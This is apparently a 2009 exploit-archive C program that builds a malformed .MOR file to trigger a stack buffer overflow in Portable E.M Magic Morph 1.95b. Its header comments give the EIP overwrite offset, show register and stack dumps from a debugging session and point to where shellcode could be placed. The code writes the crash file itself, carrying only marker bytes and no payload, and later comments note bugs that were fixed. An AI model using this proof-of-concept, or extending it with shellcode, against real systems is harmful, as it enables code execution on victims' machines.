/*********************************************************************
|
|
Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC *
|
|
By fl0 fl0w *
|
|
"can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" *
|
|
**********************************************************************
|
|
|
|
|
|
/********************************************************************************************************
|
|
The EIP offset is at 312 bytes 0x138 HEX *
|
|
After you compile and create the .MOR file, open it in a hex editor and start counting from the start *
|
|
of the file; the count should come to 0x138 bytes *
|
|
*
|
|
I used a technique named "stack spray" to determine the offset. *
|
|
*
|
|
CPU REGISTERS *
|
|
EAX 00000000 *
|
|
ECX 33333333 *
|
|
EDX 01492288 *
|
|
EBX 00000001 *
|
|
*
|
|
ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa *
|
|
````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *
|
|
XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 *
|
|
EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *
|
|
YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b *
|
|
bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa *
|
|
*
|
|
ESI 00F369B0 *
|
|
EDI 00F369B0 *
|
|
EIP 41414141 *
|
|
*
|
|
We control ECX and EIP, which is more than enough to copy whatever addresses you want into memory. *
|
|
So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption*
|
|
starts at a much lower address. *
|
|
This is what ESP points to: *
|
|
********************************************************************************************************
|
|
*/
/************************
|
|
STACK *
|
|
0012EF7C 62343434 *
|
|
0012EF80 62626262 *
|
|
0012EF84 62626262 *
|
|
0012EF88 67676262 *
|
|
0012EF8C 67676767 *
|
|
0012EF90 67676767 *
|
|
0012EF94 67676767 *
|
|
0012EF98 62676767 *
|
|
0012EF9C 61616161 *
|
|
0012EFA0 61616161 *
|
|
0012EFA4 61616161 *
|
|
0012EFA8 61616161 *
|
|
0012EFAC 61616161 *
|
|
0012EFB0 61616161 *
|
|
0012EFB4 61616161 *
|
|
0012EFB8 61616161 *
|
|
0012EFBC 61616161 *
|
|
0012EFC0 61616161 *
|
|
0012EFC4 61616161 *
|
|
0012EFC8 61616161 *
|
|
0012EFCC 60606060 *
|
|
0012EFD0 60606060 *
|
|
0012EFD4 60606060 *
|
|
0012EFD8 60606060 *
|
|
0012EFDC 60606060 *
|
|
0012EFE0 60606060 *
|
|
0012EFE4 60606060 *
|
|
0012EFE8 60606060 *
|
|
0012EFF0 60606060 *
|
|
0012EFF4 60606060 *
|
|
0012EFF8 60606060 *
|
|
0012EFFC 59595959 *
|
|
0012F000 59595959 *
|
|
0012F004 59595959 *
|
|
0012F008 59595959 *
|
|
0012F00C 59595959 *
|
|
..................... *
|
|
***********************
|
|
*/
/*************************************************
|
|
You can copy your shellcode starting from here : *
|
|
0012EC3C 63636363 *
|
|
*
|
|
0x12EF80 = 1240960 ->NOT-> A *
|
|
*
|
|
0x12EC3C = 1240124 ->NOT-> B *
|
|
*
|
|
A > B *
|
|
A - B = 836 = 0x344 *
|
|
So the stack gets corrupted a long way from ESP.*
|
|
*************************************************
|
|
*/
/*************************************************
|
|
LOOK OF THE DUMP *
|
|
0012EE4C 63 63 63 63 cccc *
|
|
0012EE54 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EE5C 32 32 32 32 32 32 32 32 22222222 *
|
|
0012EE64 32 33 33 33 33 33 33 33 23333333 *
|
|
0012EE6C 33 33 33 66 66 66 66 66 333fffff *
|
|
0012EE74 41 41 41 41 77 77 34 34 AAAAww44 *
|
|
0012EE7C 34 34 34 62 62 62 62 62 444bbbbb *
|
|
0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg *
|
|
0012EE8C 67 67 67 67 67 67 67 67 gggggggg *
|
|
0012EE94 67 67 67 67 67 67 67 62 gggggggb *
|
|
0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EECC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EED4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEDC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEE4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEEC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEF4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX *
|
|
0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX *
|
|
0012EF3C 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EF44 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EF4C 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EF54 63 63 63 63 63 63 63 63 cccccccc *
|
|
0012EF5C 32 32 32 32 32 32 32 32 22222222 *
|
|
0012EF64 32 33 33 33 33 33 33 33 23333333 *
|
|
0012EF6C 33 33 33 66 66 66 66 66 333fffff *
|
|
0012EF74 41 41 41 41 77 77 34 34 AAAAww44 *
|
|
0012EF7C 34 34 34 62 62 62 62 62 444bbbbb *
|
|
0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg *
|
|
0012EF8C 67 67 67 67 67 67 67 67 gggggggg *
|
|
0012EF94 67 67 67 67 67 67 67 62 gggggggb *
|
|
0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa *
|
|
0012EFCC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFD4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFDC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFE4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFEC 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFF4 60 60 60 60 60 60 60 60 ```````` *
|
|
0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012F004 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY *
|
|
*************************************************
|
|
*/
/**************************************************************************************
|
|
Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org *
|
|
Special greetz to OSHO,!_30,str0ke,Carcabot. *
|
|
Visit my website for more bugs, papers, exploits, PoCs and programming techniques. *
|
|
http://www.sploitz.10001mb.com *
|
|
*************************************************************************************
|
|
*/
/*************************************************************************
|
|
DEMO *
|
|
C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe *
|
|
********************************************************************* *
|
|
Magic Morph .MOR File Stack Buffer Overflow POC *
|
|
The usage is: *
|
|
All Credits fl0 fl0w *
|
|
*
|
|
-f FILE.mor *
|
|
**************************************************************************
|
|
*
|
|
C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST *
|
|
File DONE ! *
|
|
**************************************************************************
|
|
*/
/*****************************************************************************************
|
|
Technical details *
|
|
This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 *
|
|
You can download the POC along with debugging details from my website *
|
|
|
|
Preview ... *
|
|
...... *
|
|
This folder contains two screenshots from the ollydbg debugging session, the poc(MM.CPP)*
|
|
and the software Portable E.M Magic Morph 1.95b. *
|
|
ALL CREDITS GO TO fl0 fl0w for this exploit ! *
|
|
http://www.sploitz.10001mb.com/ *
|
|
........................... *
|
|
******************************************************************************************
|
|
*/
//START Algorithm
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#include "windows.h"
#include "stdint.h"
#include "getopt.h"
/* Holder for three single-byte values, stored in the order a, b, c. */
typedef struct flo {
    uint8_t a, b, c;
} F;
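/* Write one chunk to the output file; report the error and stop on a short write. */
static void mor_write_chunk(FILE *out, const uint8_t *chunk, size_t len, const char *fname)
{
    if (fwrite(chunk, sizeof chunk[0], len, out) != len) {
        perror(fname);
        fclose(out);
        exit(EXIT_FAILURE);
    }
}

/*
 * Write the proof-of-concept .MOR file to `fname`.
 *
 * Output layout, in write order (1016 bytes in total):
 *   - 3 bytes: 0x43 0x3A 0x5C, the ASCII drive prefix of the first path
 *   - hexfileP1 (349 bytes): rest of an image path, NUL padding, marker runs
 *   - hexfileP2 (320 bytes): marker runs only
 *   - hexfileP3 (344 bytes): marker run, NUL padding, a second image path,
 *     NUL padding
 *
 * The file carries no executable payload: everything outside the two path
 * strings is a run of one repeated printable byte, so a crash dump shows
 * which file offset landed where. The 0x41 0x41 0x41 0x41 dword inside
 * hexfileP1 sits at file offset 0x138, the offset the notes at the top of
 * this file report for EIP; the same notes show the 0x33 run in ECX.
 *
 * NOTE(review): the .MOR format itself is not described here, so which
 * field the target parser copies without a bound cannot be told from this
 * generator - confirm against the parser before writing a detection rule.
 *
 * fname: path of the file to create (opened with "wb", so an existing file
 *        is overwritten). Must not be NULL.
 *
 * Returns nothing. On any I/O failure the error is printed to stderr and
 * the process exits with EXIT_FAILURE; the function has no return value to
 * report it, and its caller announces success unconditionally.
 */
void buildFile(char *fname)
{
    /* "C:\" - written first so that hexfileP1 continues the same path. */
    static const uint8_t drive_prefix[] = { 0x43, 0x3A, 0x5C };

    static const uint8_t hexfileP1[] =
    {
        0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64,
        0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E,
        0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73,
        0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33,
        0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34,
        0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67,
        0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62,
    };

    static const uint8_t hexfileP2[] = {
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
    };

    static const uint8_t hexfileP3[] = {
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73,
        0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74,
        0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74,
        0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C,
        0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };

    if (fname == NULL) {
        fprintf(stderr, "buildFile: no output file name given\n");
        exit(EXIT_FAILURE);
    }

    /* The original passed an unchecked fopen() result straight to fwrite(). */
    FILE *f = fopen(fname, "wb");
    if (f == NULL) {
        perror(fname);
        exit(EXIT_FAILURE);
    }

    /*
     * The prefix used to be staged through a 3-byte heap struct and copied
     * with memcpy(..., sizeof(pointer)), which read past the allocation and
     * never freed it. Writing the three bytes directly yields the same file.
     */
    mor_write_chunk(f, drive_prefix, sizeof drive_prefix, fname);
    mor_write_chunk(f, hexfileP1, sizeof hexfileP1, fname);
    mor_write_chunk(f, hexfileP2, sizeof hexfileP2, fname);
    mor_write_chunk(f, hexfileP3, sizeof hexfileP3, fname);

    /* fclose() flushes buffered data, so a failure here means a bad file. */
    if (fclose(f) != 0) {
        perror(fname);
        exit(EXIT_FAILURE);
    }
}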
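/*
 * Scan the command line for recognised switches.
 *
 * Only -f is accepted; any other option makes the process exit with -1.
 * The option string is "f" (no trailing ':'), so getopt() does not take a
 * value for -f and leaves the file name in argv as an ordinary argument.
 *
 * argc, argv: the values main() received.
 */
void args(int argc, char *argv[])
{
    int opt;

    /*
     * The original tested `opt` before it was assigned (an uninitialised
     * read) and stored `(int)optarg` in an unused local; both are removed.
     */
    while ((opt = getopt(argc, argv, "f")) != -1) {
        switch (opt) {
        case 'f':
            /* Nothing to record: -f carries no argument as declared. */
            break;
        default:
            exit(-1);
        }
    }
}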
/*
 * Clear the console and print the banner to stdout.
 *
 * Name: accepted for the caller's convenience but not used.
 *
 * system("CLS") hands a fixed command to the command interpreter; it only
 * clears the screen where that interpreter knows CLS.
 */
void Usage (char *Name)
{
    (void)Name;

    system("CLS");

    fputs("*********************************************************************\n", stdout);
    fputs("\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n", stdout);
    fputs("The usage is:\n", stdout);
    fputs("\t\tAll Credits fl0 fl0w\n", stdout);
}
/* Print the list of command-line switches (only -f) to stderr. */
void Menu()
{
    static const char menu_text[] =
        "\n"
        "\t-f FILE.mor\n"
        "*********************************************************************"
        "\n";

    fputs(menu_text, stderr);
}
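/*
 * Entry point. Expected invocation: <program> -f NAME
 *
 * Builds the output name NAME.mor from argv[2] and hands it to buildFile().
 * argv[1] is not inspected, so any first argument is accepted in place of
 * "-f".
 *
 * Returns 0 after the file has been written; exits with -1 when too few
 * arguments are given or the resulting file name does not fit the buffer.
 */
int main(int32_t argc , char *argv[])
{
    /*
     * argv[2] is read below, so three entries are the minimum. The original
     * only required two and dereferenced a NULL argv[2] for "<program> -f".
     */
    if (argc < 3) {
        Usage(argv[0]);
        Menu();
        exit(-1);
    }

    char b[100];

    /*
     * Bounded formatting replaces strcpy()/strcat(): a long NAME used to
     * overflow this 100-byte stack buffer. Truncation is treated as an error
     * so the tool never writes to a name the user did not ask for.
     */
    int n = snprintf(b, sizeof b, "%s.mor", argv[2]);
    if (n < 0 || (size_t)n >= sizeof b) {
        fprintf(stderr, "Output file name is too long\n");
        exit(-1);
    }

    buildFile(b);
    printf("File DONE !\n");
    return 0;
}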
//END Algorithm
// milw0rm.com [2009-09-14]